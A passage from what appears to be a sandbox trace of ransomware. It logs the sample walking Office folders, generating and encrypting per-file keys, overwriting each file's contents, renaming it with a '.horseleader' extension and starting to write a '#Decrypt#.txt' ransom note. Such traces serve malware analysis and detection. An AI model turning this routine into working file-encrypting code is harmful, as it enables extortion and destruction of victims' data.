pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\pkeyconfig-office.xrm-ms") returned 108 [0244.702] StrStrIW (lpFirst="pkeyconfig-office.xrm-ms", lpSrch=".horseleader") returned 0x0 [0244.702] lstrcmpW (lpString1="pkeyconfig-office.xrm-ms", lpString2="#Decrypt#.txt") returned 1 [0244.702] lstrcmpW (lpString1="pkeyconfig-office.xrm-ms", lpString2="_uninstalling_.png") returned 1 [0244.702] lstrlenW (lpString=".testttjffg") returned 11 [0244.702] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\pkeyconfig-office.xrm-ms", lpSrch=".testttjffg") returned 0x0 [0244.702] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0244.702] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0244.702] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\pkeyconfig-office.xrm-ms" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\pkeyconfig-office.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0244.704] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\pkeyconfig-office.xrm-ms") returned 108 [0244.704] StrStrW (lpFirst="pkeyconfig-office.xrm-ms", lpSrch=".txt") returned 0x0 [0244.704] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=715834) returned 1 [0244.704] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.704] ReadFile (in: 
hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0244.707] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.707] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0244.708] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x54e1d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.709] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0244.711] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.711] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0244.712] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xa9c3a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.712] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0244.714] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.714] WriteFile (in: hFile=0x1a4, 
lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0244.715] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.715] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0244.715] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0244.715] CloseHandle (hObject=0x1a4) returned 1 [0244.715] GetProcessHeap () returned 0x780000 [0244.715] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e1110 [0244.716] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\pkeyconfig-office.xrm-ms.horseleader") returned 120 [0244.716] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\pkeyconfig-office.xrm-ms" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\pkeyconfig-office.xrm-ms"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\pkeyconfig-office.xrm-ms.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\pkeyconfig-office.xrm-ms.horseleader")) returned 1 [0244.717] GetProcessHeap () returned 0x780000 [0244.717] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e1110 | out: hHeap=0x780000) returned 1 [0244.717] FindNextFileW 
(in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6904ef00, ftCreationTime.dwHighDateTime=0x1ca912c, ftLastAccessTime.dwLowDateTime=0x6cf07e70, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6904ef00, ftLastWriteTime.dwHighDateTime=0x1ca912c, nFileSizeHigh=0x0, nFileSizeLow=0x3d78, dwReserved0=0x49ce1216, dwReserved1=0x4f93752c, cFileName="pkeyconfig.companion.dll", cAlternateFileName="PKEYCO~1.DLL")) returned 1 [0244.717] lstrcmpiW (lpString1="pkeyconfig.companion.dll", lpString2="Windows") returned -1 [0244.717] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\pkeyconfig.companion.dll") returned 108 [0244.717] StrStrIW (lpFirst="pkeyconfig.companion.dll", lpSrch=".horseleader") returned 0x0 [0244.717] lstrcmpW (lpString1="pkeyconfig.companion.dll", lpString2="#Decrypt#.txt") returned 1 [0244.717] lstrcmpW (lpString1="pkeyconfig.companion.dll", lpString2="_uninstalling_.png") returned 1 [0244.717] lstrlenW (lpString=".testttjffg") returned 11 [0244.717] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\pkeyconfig.companion.dll", lpSrch=".testttjffg") returned 0x0 [0244.718] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0244.718] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0244.718] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\pkeyconfig.companion.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\pkeyconfig.companion.dll"), 
dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0244.718] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\pkeyconfig.companion.dll") returned 108 [0244.718] StrStrW (lpFirst="pkeyconfig.companion.dll", lpSrch=".txt") returned 0x0 [0244.718] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=15736) returned 1 [0244.719] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x3d78, lpOverlapped=0x0) returned 1 [0244.721] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffc288, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.721] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x3d78, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x3d78, lpOverlapped=0x0) returned 1 [0244.721] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.721] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0244.722] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0244.722] CloseHandle (hObject=0x1a4) returned 1 [0244.722] GetProcessHeap () returned 0x780000 [0244.722] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e1110 [0244.722] wnsprintfW (in: 
pszDest=0x7e1110, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\pkeyconfig.companion.dll.horseleader") returned 120 [0244.722] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\pkeyconfig.companion.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\pkeyconfig.companion.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\pkeyconfig.companion.dll.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\pkeyconfig.companion.dll.horseleader")) returned 1 [0244.723] GetProcessHeap () returned 0x780000 [0244.723] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e1110 | out: hHeap=0x780000) returned 1 [0244.723] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf5db14d0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf5e95d10, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf5e95d10, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x49ce1216, dwReserved1=0x4f93752c, cFileName="PowerPoint.en-us", cAlternateFileName="POWERP~1.EN-")) returned 1 [0244.723] lstrcmpiW (lpString1="PowerPoint.en-us", lpString2="Windows") returned -1 [0244.723] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us") returned 100 [0244.723] lstrcmpW (lpString1="PowerPoint.en-us", lpString2=".") returned 1 [0244.723] lstrcmpW (lpString1="PowerPoint.en-us", lpString2="..") returned 1 [0244.723] lstrcmpW (lpString1="\\\\?\\C:\\Program 
Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0244.723] GetProcessHeap () returned 0x780000 [0244.723] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e1110 [0244.723] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\*") returned 102 [0244.723] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\*", lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf5db14d0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf5e95d10, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf5e95d10, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x900dc3b1, dwReserved1=0x8792a3f5, cFileName=".", cAlternateFileName="")) returned 0x7c68a0 [0244.724] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0244.725] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\.") returned 102 [0244.725] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0244.725] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf5db14d0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf5e95d10, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf5e95d10, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x900dc3b1, dwReserved1=0x8792a3f5, cFileName="..", 
cAlternateFileName="")) returned 1 [0244.725] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0244.725] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\..") returned 103 [0244.725] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0244.725] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0244.725] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe8728670, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf5db14d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe8728670, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x5aa, dwReserved0=0x900dc3b1, dwReserved1=0x8792a3f5, cFileName="PowerPointMUI.XML", cAlternateFileName="POWERP~1.XML")) returned 1 [0244.725] lstrcmpiW (lpString1="PowerPointMUI.XML", lpString2="Windows") returned -1 [0244.725] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\PowerPointMUI.XML") returned 118 [0244.725] StrStrIW (lpFirst="PowerPointMUI.XML", lpSrch=".horseleader") returned 0x0 [0244.725] lstrcmpW (lpString1="PowerPointMUI.XML", lpString2="#Decrypt#.txt") returned 1 [0244.725] lstrcmpW (lpString1="PowerPointMUI.XML", lpString2="_uninstalling_.png") returned 1 [0244.725] lstrlenW (lpString=".testttjffg") returned 11 [0244.725] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\PowerPointMUI.XML", lpSrch=".testttjffg") returned 0x0 [0244.725] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32ae820 | out: pbBuffer=0x32ae820) returned 1 [0244.725] CryptEncrypt (in: 
hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x24, dwBufLen=0x80 | out: pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x80) returned 1 [0244.726] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\PowerPointMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\powerpoint.en-us\\powerpointmui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0244.726] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\PowerPointMUI.XML") returned 118 [0244.726] StrStrW (lpFirst="PowerPointMUI.XML", lpSrch=".txt") returned 0x0 [0244.726] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x32ae8e0 | out: lpFileSize=0x32ae8e0*=1450) returned 1 [0244.726] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0x5aa, lpOverlapped=0x0) returned 1 [0244.728] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xfffffa56, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.728] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0x5aa, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0x5aa, lpOverlapped=0x0) returned 1 [0244.729] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.729] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae8d8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae8d8*, lpNumberOfBytesWritten=0x32ae904*=0x4, 
lpOverlapped=0x0) returned 1 [0244.729] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae820*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae820*, lpNumberOfBytesWritten=0x32ae904*=0x80, lpOverlapped=0x0) returned 1 [0244.729] CloseHandle (hObject=0x15c) returned 1 [0244.729] GetProcessHeap () returned 0x780000 [0244.729] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e2960 [0244.729] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\PowerPointMUI.XML.horseleader") returned 130 [0244.729] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\PowerPointMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\powerpoint.en-us\\powerpointmui.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\PowerPointMUI.XML.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\powerpoint.en-us\\powerpointmui.xml.horseleader")) returned 1 [0244.730] GetProcessHeap () returned 0x780000 [0244.730] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e2960 | out: hHeap=0x780000) returned 1 [0244.730] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xecdfa490, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf5e95d10, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xecdfa490, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x75e, dwReserved0=0x900dc3b1, dwReserved1=0x8792a3f5, cFileName="SETUP.XML", cAlternateFileName="")) 
returned 1 [0244.731] lstrcmpiW (lpString1="SETUP.XML", lpString2="Windows") returned -1 [0244.731] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\SETUP.XML") returned 110 [0244.731] StrStrIW (lpFirst="SETUP.XML", lpSrch=".horseleader") returned 0x0 [0244.731] lstrcmpW (lpString1="SETUP.XML", lpString2="#Decrypt#.txt") returned 1 [0244.731] lstrcmpW (lpString1="SETUP.XML", lpString2="_uninstalling_.png") returned 1 [0244.731] lstrlenW (lpString=".testttjffg") returned 11 [0244.731] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\SETUP.XML", lpSrch=".testttjffg") returned 0x0 [0244.731] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32ae820 | out: pbBuffer=0x32ae820) returned 1 [0244.731] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x24, dwBufLen=0x80 | out: pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x80) returned 1 [0244.731] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\powerpoint.en-us\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0244.733] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\SETUP.XML") returned 110 [0244.733] StrStrW (lpFirst="SETUP.XML", lpSrch=".txt") returned 0x0 [0244.733] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x32ae8e0 | out: lpFileSize=0x32ae8e0*=1886) returned 1 [0244.734] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, 
nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0x75e, lpOverlapped=0x0) returned 1 [0244.739] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xfffff8a2, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.739] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0x75e, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0x75e, lpOverlapped=0x0) returned 1 [0244.740] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.740] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae8d8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae8d8*, lpNumberOfBytesWritten=0x32ae904*=0x4, lpOverlapped=0x0) returned 1 [0244.740] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae820*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae820*, lpNumberOfBytesWritten=0x32ae904*=0x80, lpOverlapped=0x0) returned 1 [0244.740] CloseHandle (hObject=0x15c) returned 1 [0244.741] GetProcessHeap () returned 0x780000 [0244.741] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e2960 [0244.741] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\SETUP.XML.horseleader") returned 122 [0244.741] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\powerpoint.en-us\\setup.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft 
Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\SETUP.XML.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\powerpoint.en-us\\setup.xml.horseleader")) returned 1 [0244.742] GetProcessHeap () returned 0x780000 [0244.742] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e2960 | out: hHeap=0x780000) returned 1 [0244.742] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xecdfa490, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf5e95d10, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xecdfa490, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x75e, dwReserved0=0x900dc3b1, dwReserved1=0x8792a3f5, cFileName="SETUP.XML", cAlternateFileName="")) returned 0 [0244.742] FindClose (in: hFindFile=0x7c68a0 | out: hFindFile=0x7c68a0) returned 1 [0244.742] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\#Decrypt#.txt") returned 114 [0244.742] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\powerpoint.en-us\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, 